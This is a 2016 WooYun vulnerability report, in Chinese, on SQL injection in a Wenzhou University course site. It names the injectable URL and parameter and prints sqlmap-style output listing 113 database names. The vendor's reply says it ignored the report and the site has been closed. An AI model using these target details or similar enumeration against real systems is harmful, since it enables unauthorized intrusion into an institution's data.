温州大学某站sql注入(113库)

编号226572
Urlhttp://www.wooyun.org/bug.php?action=view&id=226572
漏洞状态漏洞已经通知厂商但是厂商忽略漏洞
漏洞标题温州大学某站sql注入(113库)
漏洞类型SQL注射漏洞
厂商wzu.edu.cn
白帽子路人甲
提交日期2016-07-06 16:53:00
公开日期2016-07-08 10:33:00
修复时间(not set)
确认时间0000-00-00 00:00:00
Confirm Spend-1
漏洞标签注射技巧
关注数0
收藏数0
白帽评级
白帽自评rank10
厂商评级
厂商评rank0
漏洞简介
rt
漏洞细节

漏洞url:
http://jpkc.wzu.edu.cn/xhyxt/col_tsjx/detail.aspx?tid=25&ID=751

POC

5EZ_K68L_G@R{IFDU7OVS2S.png


available databases [113]:
[*] 0fojn
[*] 2012tw_wzu_edu_cn
[*] admission_zizhu
[*] adver_wzu_edu_cn
[*] appraisal
[*] bqxq
[*] bwc
[*] CourseStudy
[*] csjjjc
[*] cslabapp
[*] csrenwen
[*] cswedaitlab
[*] cswzdxjldzc
[*] cswzdxjpkcxzlkc
[*] csyunfei
[*] cwcx_wzry
[*] CYJY_WZU_EDU_CN
[*] Daxuewuli
[*] dfgx
[*] dhlai
[*] Diy
[*] dqTB1tiwso8hlaVj
[*] dwzzb
[*] dxwlsy
[*] ep
[*] exuequ
[*] fazhengxy
[*] fzghc_com
[*] fzxy_cxzy
[*] gdhy
[*] ggty
[*] gongfang
[*] gyzc_wzu_edu
[*] house
[*] hqjt_wzu_edu_cn
[*] hqzyw
[*] htwlgcjs
[*] huaxueyiji
[*] hum
[*] hxsysfzx
[*] ieapp
[*] jgdzyjs
[*] jghx
[*] jjyzz1
[*] jnjp
[*] JPKC_CYSW
[*] JPKC_DJCL2010
[*] JPKC_GJG
[*] JPKC_HGKC
[*] jpkc_hlm
[*] jpkc_iet
[*] jpkc_isd
[*] jpkc_jdgc
[*] jpkc_tybj
[*] jpkc_wzu_edu_dxyd
[*] jpkc_wzu_hgylyouyan
[*] jpkc_wzu_wangqiu
[*] jpkc_wzu_zq
[*] jpkc_xdwlhx
[*] jpkc_xqjyjs
[*] jpkc_xxjsjxf
[*] jpkc_ycx
[*] jpkc_zxsxjxjn
[*] jpkccx
[*] jwc
[*] jxzh
[*] jyjxjpkc
[*] KAOBO_CHEM_WZU_EDU_CN
[*] kfpt
[*] kjcgz
[*] lahz
[*] lanqiu
[*] lcf
[*] lgbcom
[*] liuxuew_com
[*] luoshan
[*] master
[*] math_wzu_edu_cn
[*] met
[*] mobileieee
[*] model
[*] msdb
[*] nettesting
[*] network
[*] newmath
[*] paiqiu
[*] peilab
[*] PGPT_ZJ_CN
[*] psy_wzu_edu_cn
[*] qzlx
[*] ReportServer
[*] ReportServerTempDB
[*] router
[*] rtdj
[*] science
[*] scxq
[*] SiteFactory
[*] sj
[*] skc2012
[*] skc_wzu_edu_cn
[*] sq_jyxyl
[*] sq_sxjxyl
[*] suchu_wzu_edu_cn
[*] swxjxl
[*] sysglw
[*] sysj
[*] szb_wzu_edu_cn
[*] tempdb
[*] tiyu_jpkc_jmcjxw
[*] tiyu_jpkc_wushu
[*] tiyu_jpkc_xtjmc
[*] tiyu_jpkc_ystc
[*] tiyu_wzu_edu_cn_jpkc_jmc

修复方案

我不会这个的

状态信息 2016-07-06: 细节已通知厂商并且等待厂商处理中
2016-07-08: 厂商已经主动忽略漏洞,细节向公众公开
厂商回复该网站,已经被我校现代教育技术中心关闭
回应信息危害等级:无影响厂商忽略忽略时间:2016-07-08 10:33